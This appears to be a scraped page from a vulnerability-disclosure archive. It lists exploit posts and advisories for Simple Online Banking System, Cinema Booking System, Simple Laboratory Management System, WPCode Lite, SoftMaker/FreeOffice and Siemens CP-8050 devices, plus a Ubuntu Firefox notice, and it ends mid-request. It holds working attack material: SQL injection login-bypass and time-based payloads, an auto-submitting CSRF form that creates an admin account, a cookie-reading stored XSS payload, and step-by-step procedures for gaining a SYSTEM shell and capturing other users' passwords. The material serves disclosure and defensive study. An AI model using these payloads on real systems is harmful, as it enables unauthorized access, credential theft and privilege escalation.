Simple Online Banking System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    # Exploit Title: Simple Online Banking System - SQLi (Authentication Bypass)# Date: 6 Jul, 2024# CVE: N/A# Exploit Author: bRpsd# Vendor Homepage: https://www.sourcecodester.com/php/14868/banking-system-using-php-free-source-code.html# Software Link: https://www.sourcecodester.com/php/14868/banking-system-using-php-free-source-code.html# Category: Web Application# Version: 1.0# Tested on: MacOS | XamppPOC:POST http://localhost/banking/classes/Login.php?f=loginHost: localhostUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, br, zstdContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 36Origin: http://localhostConnection: keep-aliveReferer: http://localhost/banking/admin/login.phpCookie: PHPSESSID=1472a7e8f9b230194b2515a42943f687Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originusername=A' OR 1=1#&password=123    Vuln code:/classes/Login.phpVuln parameter:username    public function login(){    extract($_POST);    $qry = $this->conn->query("SELECT * from users where username = '$username' and password = md5('$password') ");    if($qry->num_rows > 0){      foreach($qry->fetch_array() as $k => $v){        if(!is_numeric($k) && $k != 'password'){          $this->settings->set_userdata($k,$v);        }      }      $this->settings->set_userdata('login_type',1);    return json_encode(array('status'=>'success'));    }else{    return json_encode(array('status'=>'incorrect','last_qry'=>"SELECT * from users where username = '$username' and password = md5('$password') "));    }  }

Simple Online Banking System 1.0 SQL Injection

Cinema Booking System version 1.0 suffers from remote SQL injection and cross site request forgery vulnerabilities.

    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ .:. Exploit Title > Cinema Booking System - Multiple Vulnerabilities.:. Google Dorks .:.intitle:Cinema Booking System.:. Date: July 5, 2024.:. Exploit Author: bRpsd.:. Contact: cy[at]live.no.:. Vendor -> https://www.phpjabbers.com/.:. Product -> https://www.phpjabbers.com/cinema-booking-system/.:. Product Version -> 1.0.:. DBMS -> MySQL.:. Tested on > macOS [*nix Darwin Kernel], on local xampp@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ ##################### |PRODUCT DESCRIPTION| #####################"The Cinema Booking System is a PHP/MySQL-based seat and ticket reservation system allowing bookings in a few easy steps. Users can process online payments, manage reservations, and customize events. This powerful cinema ticket booking system can be deployed on any website offering tickets for movies, theater, and other scheduled performances. If you purchase the booking script with a Developer License, you will be able to make your own changes to the PHP source code."Vulnerability 1: Authenticated SQL InjectionGET http://localhost/index.php?controller=pjAdminBookings&action=pjActionGetBooking&column=%27&direction=DESC&page=0&rowCount=10&uuid=%27&c_name=&from_price=&to_price=&c_email=&event_id= HTTP/1.1host: localhostUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0Accept: */*Accept-Language: en-US,en;q=0.5X-Requested-With: XMLHttpRequestConnection: keep-aliveReferer: http://localhost/index.php?controller=pjAdminBookings&action=pjActionIndexCookie: CinemaBooking=8e2ffd6bba921f964458b47fb27eb952Priority: u=1Response:You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '\' DESCLIMIT 0, 10' at line 5===========================================================================================Vulnerability 2: Cross Site Request ForgeryRisk:Privilege EscalationProof of concept:<h1>CSRF PoC</h1>    <form id="csrfForm" action="http://localhost/index.php?controller=pjAdminUsers&action=pjActionCreate" method="POST">        <input type="hidden" name="user_create" value="1">        <input type="hidden" name="role_id" value="1">        <input type="hidden" name="email" value="test@test.com">        <input type="hidden" name="password" value="123123">        <input type="hidden" name="name" value="test">        <input type="hidden" name="phone" value="">        <input type="hidden" name="status" value="T">    </form>    <script type="text/javascript">        document.getElementById('csrfForm').submit();    </script></body></html>

Cinema Booking System 1.0 SQL Injection / Cross Site Request Forgery

103 models of Toshiba Multi-Function Printers (MFP) are vulnerable to 40 different vulnerabilities including remote code execution, local privilege escalation, xml injection, and more.

Toshiba Multi-Function Printers 40 Vulnerabilities

308 different models of Sharp Multi-Function Printers (MFP) are vulnerable to 18 different vulnerabilities including remote code execution, local file inclusion, credential disclosure, and more.

Sharp Multi-Function Printer 18 Vulnerabilities

SoftMaker Office and FreeOffice suffer from a local privilege escalation vulnerability via the MSI installer. Vulnerable versions include SoftMaker Office 2024 / NX before revision 1214, FreeOffice 2021 Revision 1068, and FreeOffice 2024 before revision 1215.

SEC Consult Vulnerability Lab Security Advisory < 20240627-0 >  
=======================================================================  
               title: Local Privilege Escalation via MSI installer  
             product: SoftMaker Office / FreeOffice  
  vulnerable version: SoftMaker Office 2024 / NX before revision 1214  
                      FreeOffice 2021 Revision 1068  
                      FreeOffice 2024 before revision 1215  
       fixed version: SoftMaker Office 2024 / NX - revision 1214  
                      FreeOffice 2024 - revision 1215  
          CVE number: CVE-2023-7270  
              impact: high  
            homepage: https://www.softmaker.com/en/  
               found: 2023-11-27  
                  by: Michael Baer (Office Fürth)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Eviden business  
                      Europe | Asia

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"SoftMaker Office makes working with documents, spreadsheets and presentations  
a breeze – whether you're on Windows, Linux, Mac, iOS or Android."

Source: https://www.softmaker.com/en/products/softmaker-office

Business recommendation:  
------------------------  
The vendor provides a patch which should be installed immediately.

SEC Consult highly recommends to perform a thorough security review of the  
product conducted by security professionals to identify and resolve potential  
further security issues.

Vulnerability overview/description:  
-----------------------------------  
1) Local Privilege Escalation via MSI installer (CVE-2023-7270)  
The SoftMaker Office and FreeOffice MSI installer files were found to produce  
a visible conhost.exe window running as the SYSTEM user when using the repair  
function of msiexec.exe.

This allows a local, low-privileged attacker to use a chain of actions,  
to open a fully functional cmd.exe with the privileges of the SYSTEM user.

Note:  
This attack does not work using a recent version of the Edge Browser or  
Internet Explorer. A different browser, such as Chrome or Firefox, needs to be  
used. Also make sure, that Edge or IE have not been set as default browser  
and that Firefox or Chrome are not running before attempting to exploit it.  
Otherwise, the spawned process would be running with your own permissions and  
the installer will just add a new tab to the browser, instead of spawning a  
new process with SYSTEM.

Proof of concept:  
-----------------  
1) Local Privilege Escalation via MSI installer (CVE-2023-7270)  
For the exploit to work, SoftMaker Office or FreeOffice have to be installed  
via the MSI file. Afterwards, any low-privileged user can start the  
repair of the software by double-clicking the installer and trigger  
the vulnerable actions without a UAC popup. The installer, if deleted from it's  
original location, can be found in C:\Windows\Installer with a randomized name.

During the repair process, a console application gets called with SYSTEM  
privileges and performs a read action on some files.

SoftMaker Office: Executes 7z.exe, which reads  
C:\Program Files\SoftMaker Office 2024\tb\7z.exe

FreeOffice: Executes syspin.exe, which reads  
C:\Windows\SysWOW64\OneCoreCommonProxyStub.dll

This can be used by an attacker by simply setting an oplock on the files  
mentioned before.

As soon as it gets read, the process is blocked until the lock is released.

To do that, one can use the 'SetOpLock.exe' tool from  
"https://github.com/googleprojectzero/symboliclink-testing-tools"  
with the following parameters:

while ($true) { SetOpLock.exe "C:\Program Files\SoftMaker Office 2024\tb\7z.exe" x }  
while ($true) { SetOpLock.exe "C:\Windows\SysWOW64\OneCoreCommonProxyStub.dll" x }

See figure 1 [soft_lock.png] and figure 2 [lock.png]

During the repair process, the locked file is accessed multiple times. The lock  
has to be released by pressing ENTER several times before the window opens.

If the window appears, the lock should not be released to keep the  
window open. The window that gets opened when the console program is  
executed doesn't close and can then be interacted with.

Note 1: The syspin.exe window is minimized. When the lock is triggered, it  
is advised to check the taskbar whether a window with a blue arrow,  
see figure 7 [taskbar.png], exists.

The attacker can then perform the following actions to spawn a SYSTEM shell:  
- Right click on the top bar of the window  
- Click on properties, see figure 3 [soft_openbrowser.png] and figure 4 [openbrowser.png]  
- Under options, click on the "new console features" link  
- Open the link with e.g. firefox  
- In the opened browser window press the key combination CTRL+o  
- Type cmd.exe in the top bar and press Enter, see figure 5 [soft_cmd.png] and figure 6 [cmd.png]

Note 2: This does not work using a recent version of the Edge Browser.

Note 3: The program syspin.exe is invoked several times, sometimes without  
elevated privileges. If the final cmd.exe is not elevated, release the lock  
and wait for the next syspin.exe invocation. During our test, the fifth  
window was run with elevated privileges.

Vulnerable / tested versions:  
-----------------------------  
The following versions have been tested by SEC Consult which were the most recent  
versions available at the time of the test:  
* SoftMaker Office 2024 - 24.0.6034  
* FreeOffice 2021 Revision 1068

According to the vendor, all versions of SoftMaker Office NX/2024 before revision 1214  
and FreeOffice 2024 before revision 1215 with the MSI installer are affected.

FreeOffice 2021 is unsupported and will not be fixed according to the vendor.

Vendor contact timeline:  
------------------------  
2023-12-02: Contacting vendor through sales@softmaker.de,  
             asking for security contact.  
2023-12-07: Contacting vendor through https://www.softmaker.com/en/support/customer-support  
             asking for security contact.  
2024-01-11: Contacting vendor through https://www.softmaker.com/en/support/customer-support  
             asking for security contact.  
2024-01-11: Vendor provides security contact and asks for advisory  
             unencrypted  
2024-01-12: Sending advisory draft unencrypted to security contact  
2024-02-17: Asking for status of vulnerability, no response  
2024-03-06: Asking for status of vulnerability, no response  
2024-04-08: Asking for a status update, setting release date to  
             17th April.  
2024-04-08: Vendor response, seems not to have received our previous mails.  
             Asking for deadline extension as a release it already planned.  
2024-04-09: Sending advisory draft again, extending deadline.  
2024-04-11: Asking whether email was received, confirmed. Sent proposed  
             solution.  
2024-04-22: Asking when new release is planned and whether fixes could be  
             incorporated.  
2024-04-23: Vendor response, current service pack update not including fixes,  
             planned in about 6 weeks.  
2024-05-27: Vendor response, service pack / revision 1214 was published which fixes  
             the issue for Office 2024 and Office NX. FreeOffice 2024 will  
             be fixed in the next release mid June. FreeOffice 2021 is unsupported.  
2024-06-11: Vendor: FreeOffice 2024 will be patched on 18th June, asks for advisory  
             release to be postponed a bit.  
2024-06-17: Setting advisory release date for 27th June, reserving CVE.  
2024-06-18: Vendor releases FreeOffice 2024 revision 1215.  
2024-06-27: Release of security advisory.

Solution:  
---------  
The vendor provides a service pack version 1214 for SoftMaker Office 2024 and  
SofMaker Office NX, which can be downloaded from:  
https://softmaker.de/download/servicepacks

FreeOffice 2024 revision 1215:  
https://www.freeoffice.com/de/download/servicepacks

FreeOffice 2021 is unsupported and will not be fixed according to the vendor.

Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab  
An integrated part of SEC Consult, an Eviden business  
Europe | Asia

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Eviden business. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: https://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF Michael Baer / 2024

SoftMaker Office / FreeOffice Local Privilege Escalation

Siemens CP-8000, CP-8021, CP8-022, CP-8031, CP-8050, and SICORE products suffer from buffer overread, privilege escalation, and unsafe storage vulnerabilities.

SEC Consult Vulnerability Lab Security Advisory < 20240626-0 >  
=======================================================================  
               title: Multiple Vulnerabilities in Power Automation Products  
             product: Siemens CP-8000/CP-8021/CP8-022/CP-8031/CP-8050/SICORE  
  vulnerable version: CPC80 < V16.41 / CPCI85 < V5.30 / OPUPI0 < V5.30 / SICORE < V1.3.0 /  
                      CPCX26 < V06.02 for CP-2016 and PCCX26 < V06.05 for CP-2019 in SICAM AK3 /  
                      ETA4 < V10.46 and ETA5 < V03.27 for SM-2558 ins SICAM AK3, SICAM BC and SICAM TM  
       fixed version: CPC80 V16.41 / CPCI85 V5.30 / OPUPI V5.30 / SICORE V1.3.0 / CPCX26 V06.02 /  
                      PCCX26 V06.05 / ETA4 V10.46 / ETA5 V03.27  
          CVE number: CVE-2024-31484, CVE-2024-31485, CVE-2024-31486  
              impact: high  
            homepage: https://www.siemens.com/global/en/products/energy/energy-automation-and-smart-grid.html  
               found: 2023-04-03 and 2024-01-12  
                  by: Stefan Viehboeck (Office Vienna)  
                      Steffen Robertz (Office Vienna)  
                      Gerhard Hechenberger (Office Vienna)  
                      Constantin Schieber-Knoebl (Office Vienna)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Eviden business  
                      Europe | Asia

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"We are a technology company focused on industry, infrastructure,  
transport, and healthcare. From more resource-efficient factories,  
resilient supply chains, and smarter buildings and grids, to cleaner  
and more comfortable transportation as well as advanced healthcare,  
we create technology with purpose adding real value for customers."

Source: https://new.siemens.com/global/en/company/about.html

Business recommendation:  
------------------------  
The vendor provides a patch which should be installed immediately.

SEC Consult highly recommends to perform a thorough security review of the product  
conducted by security professionals to identify and resolve potential further  
security issues.

Vulnerability overview/description:  
-----------------------------------  
1) Buffer Overread (Only CP-8000/CP-8021/CP-8022/CP-8031/CP-8050/CPCX26/PCCX26/ETA4/ETA5, CVE-2024-31484)  
The webserver running on the CP-8050 and CP-8031 is vulnerable to a buffer overread  
vulnerability.

The value of the HTTP header "Session-ID" is processed and used in a "strncpy" call  
without proper termination. Thus, data structures from the BSS segment will be  
leaked in the response. Attackers might be able to read sensitive data from memory.

2) Privilege Escalation (Only CP-8031/CP-8050 and SICORE devices, CVE-2024-31485)  
An attacker with an account with the viewer (or higher) role can intercept unencrypted  
traffic of other users of the web interface. Thus, the attacker can intercept higher  
privileged user accounts and passwords and might gain access to their accounts to  
perform tasks with elevated privileges.

3) Unsafe Storage of MQTT Client Passwords (Only CP-8031/CP-8050, CVE-2024-31486)  
A PLC with the OPUPI0 MQTT application installed is able to connect to  
an MQTT server. The configured MQTT password for the server is stored  
in cleartext on the device and can be read by exploiting a potential  
code execution or file disclosure vulnerability or with physical access  
to the device.

Proof of concept:  
-----------------  
1) Buffer Overread (Only CP-8000/CP-8021/CP-8022/CP-8031/CP-8050/CPCX26/PCCX26/ETA4/ETA5, CVE-2024-31484)  
The buffer overread can be triggered by sending a "Session-ID" in the HTTP request header  
with exactly 20 bytes. This can be done with e.g. this request:

POST /SICAM_TOOLBOX_1703_remote_connection_00.htm HTTP/1.1  
User-Agent: SICAM TOOLBOX II  
Version: 1  
Session-ID: 3814280BA9921c6cAAAA  
Sequence-ID: 1  
Content-Length: 8  
Content-Type: text/plain  
KeepAlive: 5  
Connection: close  
type=3

The server answers with following response:

HTTP/1.1 200 OK  
Server: SICAM 1703  
Version: 1  
Session-ID: 3814280BA9921c6cAAAAæk¤  
Cache-Control: max-age=0, private  
X-Frame-Options: sameorigin  
Strict-Transport-Security: max-age=31536000; includeSubdomains  
Content-Security-Policy: default-src 'self' data: blob: 'unsafe-inline' 'unsafe-eval'  
X-XSS-Protection: 1; mode=block  
X-Permitted-Cross-Domain-Policies: none  
Content-Length: 71  
Connection: close  
Date: Wed, 30 Mar 2022 01:38:37 GMT

Sequence-ID: 1  
Content-Type: text/plain  
Content-Length: 8

type=4

The Session-ID in the response leaks at least 4 additional bytes. Further,  
the structure of the response is broken, as some HTTP headers are suddenly part  
of the body.

The vulnerability most likely stems from a misuse of the strncpy function.  
The following code segment was analyzed (RTUM85.elf, Offset 0x1d50de):

ptr_fcgi_header = get_fcgi_param(fcgi_struct, "HTTP_SESSION_ID);  
if (ptr_fcgi_header == (char*) 0x00) goto LAB_001d4a66;  
if ( is_a_session_available == 0 ) {  
     strncpy(&session_id, ptr_fcgi_header, 0x14);  
}

strncpy is called with a length parameter of 0x14. To trigger the vulnerability,  
we are sending exactly 0x14 bytes. Thus, we believe that the global session_id  
variable is never properly terminated with a Null-pointer.

libc's documentation even contains a warning for this case:  
"If there is no null byte among the first n bytes of src, the string  
placed in dest will not be null-terminated."

Thus, if the response is built, every data structure in BSS following the  
session_id global will be printed as string until a Null byte is encountered.

2) Privilege Escalation (Only CP-8031/CP-8050 and SICORE devices, CVE-2024-31485)  
An attacker with an account with the viewer (or higher) role can intercept unencrypted  
traffic of other users of the web interface. Thus, the attacker can intercept higher  
privileged user accounts and passwords.

By starting the Ethernet Packet Capture (Home -> Monitoring & Simulation -> Ethernet  
Packet Capture), a request is sent. This request can be modified by an interceptor  
proxy (e.g. Burp Suite).

POST /sicweb-ajax/rtum85/cview HTTP/1.1  
Host: HOST  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/xml  
SICWEB-SID: xNG1v825qFmCMo8hpjfISlVARKipW1B+lz9d5FoBxipR87VT  
Content-Length: 198  
Origin: http:// HOST  
Connection: close  
Referer: http:// HOST/

<?xml version="1.0" encoding="UTF-8"?>  
<Cmd_SetCustomViewValue><view id="packet_capture"><parameter id="p0">  
<value>lo</value>  
</parameter></view></Cmd_SetCustomViewValue>

The attacker can then send the parameter id p0 to the value "lo" and start the  
packet capture in order to dump from the loopback interface. It is a valid  
interface, as it only consist of lowercase characters and numbers (fix  
for CVE-2023-33919).

However, the webserver implements TLS in a stunnel fashion. It accepts all  
TLS traffic on port 443, then decrypts it and forwards it via loopback interface  
to port 80. By being able to read the loopback traffic, an attacker can now  
see all communication, including passwords of higher privileged users.

3) Unsafe Storage of MQTT Passwords (Only CP-8031/CP-8050, CVE-2024-31486)  
To demonstrate the issue, the following parameters were set for the MQTT client  
using the Siemens Toolbox II:  
* "8 MQTT password" mqtt_pw_sectest  
* "9 MQTT username" mqtt_sectest

The password (together with the username) can be located in the  
/ies/data/local/system/iescfg.iar file on the device, which can be  
retrieved by shell access/code execution on the device or by desoldering  
and reading its unencrypted flash memory chip:  
-----------------------------------------------------------------------  
grep -rain "mqtt_pw_sectest" /ies/data/local/system/iescfg.iar  
[...]  
mqtt  
mqtt_sectest.  
mqtt_pw_sectest.  
< �MQTT_Broker  
[...]  
-----------------------------------------------------------------------

Vulnerable / tested versions:  
-----------------------------  
The following version has been tested which was the latest version available  
at the time of the test:

Vulnerability 1 and 2 were confirmed on Siemens SICAM A8000 CP-8031 V05.12  
Vulnerability 3 was confirmed on Siemens A8000 CP-8050 V04.92

Vendor contact timeline:  
------------------------  
2023-04-18: Contacting vendor through productcert@siemens.com for vulnerability 3  
2023-04-19: Advisory will be handled as case #92461.  
2023-06-13: Siemens releases advisory for other vulnerabilities, see https://sec-consult.com/vulnerability-lab/advisory/multiple-vulnerabilities-siemens-a8000/  
2023-10-09: Requesting status update  
2024-04-03: Requesting status update.  
2024-04-04: Unsafe Storage of MQTT password: fix will be released in April 2024,  
             Siemens advisory scheduled for May 2024  
2024-04-11: Contacting vendor through productcert@siemens.com for Vulnerability 1 and 2  
2024-04-12: Siemens assigned case #68662 for Vulnerability 1,2  
2024-05-14: Siemens publishes SSA-871704 for vulnerability 1,2,3  
2024-06-11: Siemens publishes SSA-620338 for Vulnerability 1  
2024-06-26: Public release of advisory

Solution:  
---------  
The vendor provides a patch which can be downloaded at the following URLs  
depending on the affected device:

CPC80 Central Processing/Communication: The firmware CPC80 V16.41 is present within “CP-8000/CP-8021/CP-8022 Package” V16.41  
https://support.industry.siemens.com/cs/ww/en/view/109812178/

CPCI85 Central Processing/Communication: The firmware CPCI85 V5.30 is present within "CP-8031/CP-8050 Package" V5.30  
https://support.industry.siemens.com/cs/ww/en/view/109804985/

SICORE Base system: The firmware SICORE V1.3.0 is present within "SICAM 8 Software Solution Package" V5.30  
https://support.industry.siemens.com/cs/ww/en/view/109818240/

OPUPI0 AMQP/MQTT: The firmware OPUPI0 V5.30 is present within "CP-8031/CP-8050 Package" V5.30  
https://support.industry.siemens.com/cs/ww/en/view/109804985/

CPCX26 Central Processing/Communication: The firmware CPCX26 V06.02 is present within “SICAM RTUs AK3 Package” V06.02  
https://support.industry.siemens.com/cs/ww/en/view/109813252/

PCCX26 Ax 1703 PE, Contr, Communication Element: The firmware PCCX26 V06.05 is present within “SICAM RTUs AK3 Package” V06.02  
https://support.industry.siemens.com/cs/ww/en/view/109813252/

ETA4 Ethernet Interface IEC60870-5-104: The firmware ETA4 V10.46 is present within “SICAM RTUs AK3 Package” V06.02  
https://support.industry.siemens.com/cs/ww/en/view/109813252/

ETA5 Ethernet Int. 1x100TX IEC61850 Ed.2: The firmware ETA5 V03.27 is present within “SICAM RTUs AK3 Package” V06.02  
https://support.industry.siemens.com/cs/ww/en/view/109813252/

Additional information from the vendor can be found in their advisories:  
https://cert-portal.siemens.com/productcert/html/ssa-871704.html  
https://cert-portal.siemens.com/productcert/html/ssa-620338.html

Workaround:  
-----------  
Limit network and physical access to the PLC.

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab  
An integrated part of SEC Consult, an Eviden business  
Europe | Asia

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Eviden business. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: https://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF Stefan Viehboeck, Steffen Robertz, Gerhard Hechenberger, Constantin Schieber-Knoebl  / @2024

Siemens CP-8000 / CP-8021 / CP8-022 / CP-8031 / CP-8050 / SICORE Buffer Overread / Escalation

Ubuntu Security Notice 6862-1 - Multiple security issues were discovered in Firefox. If a user were tricked into opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service, obtain sensitive information across domains, or execute arbitrary code. Lukas Bernhard discovered that Firefox did not properly manage memory during garbage collection. An attacker could potentially exploit this issue to cause a denial of service, or execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-6862-1July 03, 2024firefox vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:Several security issues were fixed in Firefox.Software Description:- firefox: Mozilla Open Source web browserDetails:Multiple security issues were discovered in Firefox. If a user weretricked into opening a specially crafted website, an attacker couldpotentially exploit these to cause a denial of service, obtain sensitiveinformation across domains, or execute arbitrary code. (CVE-2024-5689,CVE-2024-5690, CVE-2024-5691, CVE-2024-5693, CVE-2024-5697, CVE-2024-5698,CVE-2024-5699, CVE-2024-5700, CVE-2024-5701)Lukas Bernhard discovered that Firefox did not properly manage memoryduring garbage collection. An attacker could potentially exploit thisissue to cause a denial of service, or  execute arbitrary code.(CVE-2024-5688)Lukas Bernhard discovered that Firefox did not properly manage memory inthe JavaScript engine. An attacker could potentially exploit this issue toobtain sensitive information. (CVE-2024-5694)Irvan Kurniawan discovered that Firefox did not properly handle certainallocations in the probabilistic heap checker. An attacker couldpotentially exploit this issue to cause a denial of service.(CVE-2024-5695)Irvan Kurniawan discovered that Firefox did not properly handle certaintext fragments in input tags. An attacker could potentially exploit thisissue to cause a denial of service. (CVE-2024-5696)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS   firefox                         127.0.2+build1-0ubuntu0.20.04.1After a standard system update you need to restart Firefox to make all thenecessary changes.References:   https://ubuntu.com/security/notices/USN-6862-1   CVE-2024-5688, CVE-2024-5689, CVE-2024-5690, CVE-2024-5691,   CVE-2024-5693, CVE-2024-5694, CVE-2024-5695, CVE-2024-5696,   CVE-2024-5697, CVE-2024-5698, CVE-2024-5699, CVE-2024-5700,   CVE-2024-5701Package Information:   https://launchpad.net/ubuntu/+source/firefox/127.0.2+build1-0ubuntu0.20.04.1

Ubuntu Security Notice USN-6862-1

Simple Laboratory Management System version 1.0 suffers from a remote time-based SQL injection vulnerability.

    # Exploit Title: Simple Laboratory Management System - Manual Blind Time Based SQL Injection# Exploit Description: A SQL Injection vulnerability in Computer Laboratory Management System v1.0 allows attackers to execute arbitrary SQL commands on the database server which causes the services to delay in response time.# Affected Asset: The "delete_users" function in Users.php inside the Computer Laboratory Management System v1.0 application is vulnerable to Blind Time Based SQL Injection.# Exploit Author: Smitha Bhabal# Date: 2024-06-30# Vendor Homepage: https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-lms.zip# Version: 1.0# Tested On: Windows 11 Home 22631.3737 + XAMPP 3.3.0 (April 6th 2021)# Reference: https://github.com/payloadbox/sql-injection-payload-listPOST /php-lms/classes/Users.php?f=delete HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-GB,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-aliveCookie: PHPSESSID=1bfs2uc82iaorimhamvfj2qi6uUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?1DNT: 1Sec-GPC: 1Priority: u=1Content-Length: 45Content-Type: application/x-www-form-urlencodedid=(select%20*%20from%20(select(sleep(20)))a)

Simple Laboratory Management System 1.0 SQL Injection

WordPress WPCode Lite plugin version 2.1.14 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Wordpress WPCode Lite Version 2.1.14 Stored XSS# Date: 2024-06-30# Exploit Author: tmrswrr# Category : Webapps# Vendor Homepage: https://wpcode.com/?utm_source=wprepo&utm_medium=link&utm_campaign=liteplugin# Version 2.1.14### Steps to Execute the Payload:1. **Access the Admin Panel:**   - Navigate to the admin panel of your WordPress site.   - Go to `Code Snippets > `Edit Snippet` via the following URL:      ```     https://127.0.0.1/wp-admin/admin.php?page=wpcode-snippet-manager&snippet_id=10     ```2. **Insert the Payload:**   - In the **Code Preview** section, insert the following payload:     ```     "><img src=x onerrora=confirm() onerror=confirm(document.cookie)>     ```3. **Save and Verify:**   - Active , Save the changes.   - Navigate to the main page of your site:     ```     https://127.0.0.1/     ```   - You should see the payload executed.Post Request :POST /wp-admin/admin.php?page=wpcode-snippet-manager&snippet_id=10 HTTP/2Host: 127.0.0.1Cookie: wordpress_sec_f8b0c342e0d48561e75d0c6818e29f16=admin%7C1720960057%7CA75X38uHvZeAN0Mrrbpj5brIJolGFEapEPEUcg7PyPe%7C37619eff632d24400e28a219976a87efa83c4bae1ebe04120e54cb37dbe30a03; wordpress_logged_in_f8b0c342e0d48561e75d0c6818e29f16=admin%7C1720960057%7CA75X38uHvZeAN0Mrrbpj5brIJolGFEapEPEUcg7PyPe%7C49992c3be16529995b5429fdd992a2dc1ff8cafa77c6f72580d9dbf9f3fe82ca; wp-settings-time-1=1719753966; WP-TSW-Session=5lursai747c2vcd5uno86liv2c; wp-settings-1=editor%3DhtmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: https://127.0.0.1/wp-admin/admin.php?page=wpcode-snippet-manager&snippet_id=10Content-Type: application/x-www-form-urlencodedContent-Length: 673Origin: https://vagabondcreature.s3-tastewp.comDnt: 1Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: 